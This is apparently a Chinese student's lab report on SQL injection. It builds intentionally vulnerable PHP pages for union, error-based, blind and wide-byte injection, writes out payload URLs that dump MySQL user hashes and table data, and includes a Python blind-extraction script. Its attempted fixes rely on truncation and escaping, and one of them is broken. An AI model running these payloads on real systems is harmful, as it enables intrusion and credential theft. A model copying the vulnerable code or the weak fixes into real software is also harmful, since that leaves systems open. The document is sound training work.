要求 0x01 1、编写常规回显注入的代码,在之前的搭建的环境中测试是否正常
2、编写报错注入的代码,并做相应的服务器配置来满足条件,并测试代码是否正常
3、编写盲注的代码,在之前的搭建的环境中测试是否正常
4、编写宽子节注入的代码,并做相应的服务器配置来满足条件,并测试代码是否正常
注意事项:环境可以是虚拟机的快照、也可以是 docker 环境,具体用什么可以自选,重点是学习造成这几类注入的原因;注入漏洞通常会出现在多个场景,比如:注册、登录、查询、搜索、留言等,所以写那些脚本的时候可以自选场景,不限于举例的场景;有些注入环境与服务器配置相关,需要大家配置相应的漏洞环境来结合自己编写的脚本完成漏洞环境的搭建。
环境
用的是树莓派上的docker
参考sqli-labs
docker :joaquindlz/rpi-docker-lamp
信息:
版本 : 5.5.40-1+rpi1
版本: Apache/2.4.10 (Raspbian)
版本: PHP 5.6.6-2 (cli)
目录:
1 2 3 4 5 6 7 8 9 10 11 12 13 |-- connect | |-- connect.php | `-- db-config.php |-- demo1 | `-- index.php |-- demo2 | `-- index.php |-- demo3 | `-- index.php |-- demo4 | `-- index.php |-- index.html `-- setup-db.ph
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns ="http://www.w3.org/1999/xhtml" > <head > <meta http-equiv ="Content-Type" content ="text/html; charset=utf-8" /> <title > index</title > </head > <body bgcolor ="#AAAAAA" > <div style =" margin-top:70px;color:#FFF; font-size:23px; text-align:center" > welcome to challenge <br > </div > <a href ="setup-db.php" > <font color ="#E4287C" > 请先重置数据库</font > </a > </br > </br > <a href ="./demo1/index.php" > <font color ="#AACCAA" > 常规回显注入</font > </a > </br > </br > <a href ="./demo2/index.php" > <font color ="#AA0000" > 报错注入</font > </a > </br > </br > <a href ="./demo3/index.php" > <font color ="#0000FF" > 盲注</font > </a > </br > </br > <a href ="./demo4/index.php" > <font color ="#FFFFFF" > 宽子节注入</font > </a > </br > </br > </body > </html >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>SETUP DB</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center" > Welcome <font color="#0000FF" > to challenge</font> <br> </div> <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:left" > <font size="3" color="#000000" > 重置数据库: <br><br> <!--来自sqli-labs--> <?php include ("./connect/db-config.php" );$conn = mysql_connect($host,$dbuser,$dbpass); if (!$conn){ die ('[*] 无法连接: ' .mysql_error()); } $sql="DROP DATABASE IF EXISTS security" ; if (mysql_query($sql)) { echo "[*] 成功删除旧数据库;" ."<br>" ; } else { echo "无法正常删除旧数据库;" ."<br>" ; } $sql="CREATE database `security` CHARACTER SET `gbk` " ; if (mysql_query($sql)) { echo "[*] security数据库创建成功;" ."<br>" ; } else { echo "[*] 错误 : " .mysql_error()."<br>" ; } $sql="CREATE TABLE security.users (id int(3) NOT NULL AUTO_INCREMENT PRIMARY KEY, username varchar(20) NOT NULL, password varchar(20) NOT NULL);" ; if (mysql_query($sql)) { echo "[*] user表格创建成功" ."<br>" ; } else { echo "[*] 错误 : " .mysql_error()."<br>" ; } $sql="INSERT INTO security.users (id, username, password) VALUES ('1', 'xzas', 'xzas'), ('2', 'fe1w0', 'flag2333'), ('3', 'demo', 'nothing'), ('4', 'admin', 'iamnotanadmin'), ('5', 'stupid', 'stupidity');" ; if (mysql_query($sql)) { echo "[*] 插入数据到user表成功" ."<br>" ; } else { echo "[*] 插入数据失败 : " . mysql_error()."<br>" ; } ?>
connect
connect.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php include ("db-config.php" );$con = mysql_connect($host,$dbuser,$dbpass,$dbname); if (mysqli_connect_errno($con)){ echo ('[*] 连接失败: ' .mysqli_connect_errno()); } else { @mysql_select_db($dbname,$con) or die ("[*] Error::无法选择数据库 $dbname " ); } ?>
db-config.php
1 2 3 4 5 6 7 8 <?php $dbuser ='root' ; $dbpass ='demo' ; $dbname ="security" ; $host = 'localhost' ; ?>
1. 常规回显注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>1. 常规回显注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >1. <font color="#AACCAA" > 常规回显注入 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); $id = 1 ; if (isset ($_GET['id' ])){ $id = $_GET['id' ]; $sql="SELECT * FROM users WHERE id='$id ' LIMIT 0,1 ;" ; echo $sql."<br>" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<font size='5' color= '#99FF00'>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
2.报错注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2. 报错注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >2. <font color="#AA0000" > 报错注入 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); $id = 1 ; if (isset ($_GET['id' ])){ $id = $_GET['id' ]; $sql="SELECT * FROM users WHERE id='$id ' LIMIT 0,1 ;" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<font size='5' color= '#99FF00'>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; print_r(mysql_error()); echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
3. 盲注
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>3. 盲注</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >3. <font color="#0000FF" > 盲注 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); $id = 1 ; if (isset ($_GET['id' ])){ $id = $_GET['id' ]; $sql="SELECT * FROM users WHERE id='$id ' LIMIT 0,1 ;" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "Welcome to challenge;" ; } else { echo '<font color= "#FF0000">' ; echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
4.宽子节注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>4. 宽子节注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >4. <font color="#FFFFFF" > 宽子节注入 </font><br> <font size="3" color="#FFFFFF" > <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0AA; text-align:center; width:400px; height:150px;" > <div style="padding-top:10px; font-size:15px;" > <!--Form to post the data for sql injections Error based SQL Injection--> <form action="" name="form1" method="post" > <div style="margin-top:15px; height:30px;" >Username : <input type="text" name="uname" value="" /> </div> <div> Password : <input type="text" name="passwd" value="" /> </div></br> <div style=" margin-top:9px;margin-left:90px;" > <input type="submit" name="submit" value="Submit" /> </div> </form> </div> </div> </font> <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); if (isset ($_POST['uname' ]) && isset ($_POST['passwd' ])){ $uname1=$_POST['uname' ]; $passwd1=$_POST['passwd' ]; $uname = mysql_real_escape_string($uname1); $passwd= mysql_real_escape_string($passwd1); mysql_query("SET NAMES gbk" ); @$sql="SELECT username, password FROM users WHERE username='$uname ' and password='$passwd ' LIMIT 0,1" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<br>" ; echo '<font color= "#FFFF00" font size = 4>' ; echo '<font size="3" color="#0000ff">' ; echo "<br>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "<br>" ; echo "</font>" ; echo "<br>" ; echo "<br>" ; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; print_r(mysql_error()); echo "</font>" ; } } else { echo ('<font color="#000000" > please post the your uname and passwd.</font>' ) ; } ?> </div> </body> </html>
要求 0x02 1、手工测试之前搭建的不同注入环境,并记录 sql 语句,最终以获取 mysql 中的用户信息和当前表的信息为目标
2、思考通过注入漏洞可以做什么?
3、思考注入漏洞如何防御?代码、服务器等角度
扩展学习:针对不同的注入漏洞,编写防御代码,具体如何防御自己决定,相关代码均记录在报告中,测试自己的防御代码是否可以绕过,并将过程进行记录
趁热打铁
注入测试 0x01 常规回显注入 mysql 中的用户信息
联合查找
1 http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='mysql' limit 1,2 --+
response
columns_priv,db,event,func,general_log,help_category,help_keyword,help_relation,help_topic,host,ndb_binlog_index,plugin,proc,procs_priv,proxies_priv,servers,slow_log,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user
1 http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='mysql' and table_name= 'user' limit 1,2 --+
response
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin
1 http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1, group_concat(user,password) ,1 from mysql.user limit 1,2 --+
response
rootC142FB215B6E05B7C134B1A653AD4B455157FD79,root,root,root,admin 003DF4A877C26FE99DBABE143C8BB6295BCE6316
当前表的信息
1 http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1 ,database (),3 from information_schema.columns where table_schema=database () and table_name= 'users' limit 1 ,2
security
1 http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1 ,group_concat (table_name),3 from information_schema.tables where table_schema=database () limit 1 ,2
users
1 http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1 ,group_concat (column_name),3 from information_schema.columns where table_schema=database () and table_name= 'users' limit 1 ,2
id,username,password
1 http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1 ,group_concat (username,"|" ,password ),3 from security.users limit 1 ,2
username:xzas|password:xzas,username:fe1w0|password:flag2333,username:demo|password:nothing,username:admin|password:iamnotanadmin,username:stupid|password:stupidity
0x02 报错注入
以mysql为例,查询security一样
1 http://localhost/demo/work/demo/demo2/index.php?id=1' and extractvalue(0x0a,concat(0x0a,(select database ())))
XPATH syntax error: ‘ security’
1 http://localhost/demo/work/demo/demo2/index.php?id=1' and extractvalue(0x0a,concat(0x0a,(select group_concat (table_name) from information_schema.tables where table_schema='mysql' )))
需要注意的是,报错注入的反显长度
XPATH syntax error: ‘ columns_priv,component,db,defau’
解决方法:
利用mid 来更改长度就可
如
1 http://localhost/demo/work/demo/demo2/index.php?id=1' and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(table_name),32,32) from information_schema.tables where table_schema='mysql' )))--+
XPATH syntax error: ‘ lt_roles,engine_cost,func,gener’
1 http://localhost/demo/work/demo/demo2/index.php?id=1' and extractvalue(0x0a,concat(0x0a,(select mid (group_concat (column_name),1 ,32 )from information_schema.columns where table_schema='mysql' and table_name= 'user' )))
XPATH syntax error: ‘ Host,User,Select_priv,Insert_pr’
1 2 http://localhost/demo/work/demo/demo2/index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat (host) from mysql.user ),0x7e ),1 )
XPATH syntax error: ‘~localhost,localhost,localhost,l’
0x03 盲注
布尔盲注为例
以查询database()为例
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 import requests result = "" url_template = "http://192.168.3.3:9999/demo/demo3/index.php? id=0' || ascii(substr(({0}),{1},1))={2} %23" chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~" url_length = "http://192.168.3.3:9999/demo/demo3/index.php?id=0' || length(({0})) ={1} %23" Value ="Welcome " def get_result_length (payload,Value ): for n in range(1 ,100 ): url = url_length.format(payload,n) response = requests.get(url) if Value in response.text: print("[*] length:" + str(n)) return n def get_db_name (data_length,payload,Value ): for i in range(1 ,data_length): for char in chars: url = url_template.format(payload,i,ord(char)) response = requests.get(url) if Value in response.text: global result result += char break payload = "database() " data_length = get_result_length(payload,Value)+1 get_db_name(data_length,payload,Value ) print("[*] data:" + result)
[*]
length:8[*]
data:security [Finished in 7.4s]
0x04 宽子节注入 payload
post
1 passwd=123&submit=Submit&uname=%EF%BF%BD%27+or+1%3D1%23
再配合布尔注入、报错注入或延时注入
例如
1 passwd=123&submit=Submit&uname=%EF%BF%BD%27+or+extractvalue(0x0a,concat(0x0a,(select database ())))
XPATH syntax error: ‘ security’
防御修复 0x01 修复点:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>1. 常规回显注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >1. <font color="#AACCAA" > 常规回显注入 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); function check_input ($value ) { if (!empty ($value)) { $value = substr($value,0 ,10 ); } if (get_magic_quotes_gpc()) { $value = stripslashes($value); } if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'" ; } else { $value = intval($value); } return $value; } $id = 1 ; if (isset ($_GET['id' ])){ $id = check_input($_GET['id' ]); $sql="SELECT * FROM users WHERE id= $id LIMIT 0,1 ;" ; echo $sql."<br>" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<font size='5' color= '#99FF00'>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
对特殊字符串进行转义
http://localhost/demo/work/demo/demo1/?id=100%df' union select 1 ,user(),3 limit 1,2 #
失败
感觉一方面长度过长,一方面无法因不是gbk
用宽字节注入
可以尝试预处理,来绕过长度过滤。
0x02
报错注入的问题是显示报错信息,关闭就行
但配合布尔或延时还是可以继续注入
可以继续用上面的check_input来过滤
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2. 报错注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >2. <font color="#AA0000" > 报错注入 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );function check_input ($value ) { if (!empty ($value)) { $value = substr($value,0 ,10 ); } if (get_magic_quotes_gpc()) { $value = stripslashes($value); } if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'" ; } else { $value = intval($value); } return $value; } error_reporting(0 ); mysqli_select_db($con,$dbname); $id = 1 ; if (isset ($_GET['id' ])){ $id = check_input($_GET['id' ]); $sql="SELECT * FROM users WHERE id='$id ' LIMIT 0,1 ;" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<font size='5' color= '#99FF00'>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
0x03 同样可以对查询的长度进行限制。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>3. 盲注</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >3. <font color="#0000FF" > 盲注 </font><br> <font size="3" color="#FFFFFF" > <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); function check_input ($value ) { if (!empty ($value)) { $value = substr($value,0 ,10 ); } if (get_magic_quotes_gpc()) { $value = stripslashes($value); } if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'" ; } else { $value = intval($value); } return $value; } $id = 1 ; if (isset ($_GET['id' ])){ $id = check_input($_GET['id' ]); $sql="SELECT * FROM users WHERE id='$id ' LIMIT 0,1 ;" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "Welcome to challenge;" ; } else { echo '<font color= "#FF0000">' ; echo "</font>" ; } } else { echo ('<font color="#000000"> please input the id as parameter.</font>' ) ; } ?> </font> </div> </body> </html>
0x04 宽字节注入的话
添加check_input函数并取消gbk格式
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>4. 宽子节注入</title> </head> <body bgcolor="#AAAAAA" > <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center" >4. <font color="#FFFFFF" > 宽子节注入 </font><br> <font size="3" color="#FFFFFF" > <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0AA; text-align:center; width:400px; height:150px;" > <div style="padding-top:10px; font-size:15px;" > <!--Form to post the data for sql injections Error based SQL Injection--> <form action="" name="form1" method="post" > <div style="margin-top:15px; height:30px;" >Username : <input type="text" name="uname" value="" /> </div> <div> Password : <input type="text" name="passwd" value="" /> </div></br> <div style=" margin-top:9px;margin-left:90px;" > <input type="submit" name="submit" value="Submit" /> </div> </form> </div> </div> </font> <?php include ("../connect/connect.php" );error_reporting(0 ); mysqli_select_db($con,$dbname); function check_input ($value ) { if (!empty ($value)) { $value = substr($value,0 ,10 ); } if (get_magic_quotes_gpc()) { $value = stripslashes($value); } if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'" ; } else { $value = intval($value); } return $value; } if (isset ($_POST['uname' ]) && isset ($_POST['passwd' ])){ $uname1=$_POST['uname' ]; $passwd1=$_POST['passwd' ]; $uname = check_input($uname1); $passwd= check_input($passwd1); @$sql="SELECT username, password FROM users WHERE username='$uname ' and password='$passwd ' LIMIT 0,1" ; $result=mysql_query($sql); $row = mysql_fetch_array($result); if ($row) { echo "<br>" ; echo '<font color= "#FFFF00" font size = 4>' ; echo '<font size="3" color="#0000ff">' ; echo "<br>" ; echo 'Your Login name:' . $row['username' ]; echo "<br>" ; echo 'Your Password:' .$row['password' ]; echo "<br>" ; echo "</font>" ; echo "<br>" ; echo "<br>" ; echo "</font>" ; } else { echo '<font color= "#FF0000">' ; print_r(mysql_error()); echo "</font>" ; } } else { echo ('<font color="#000000" > please post the your uname and passwd.</font>' ) ; } ?> </div> </body> </html>
后记 emmm 信安之路上的报告,应该是打算推一周,想把最近好的比赛上的知识点好好吸收
特别是ssrf、xss 、代码审计这两块,被前辈问倒好多问题。害,加油学。
考试推迟到24号后,嗯 nice ~。。。学习不能丢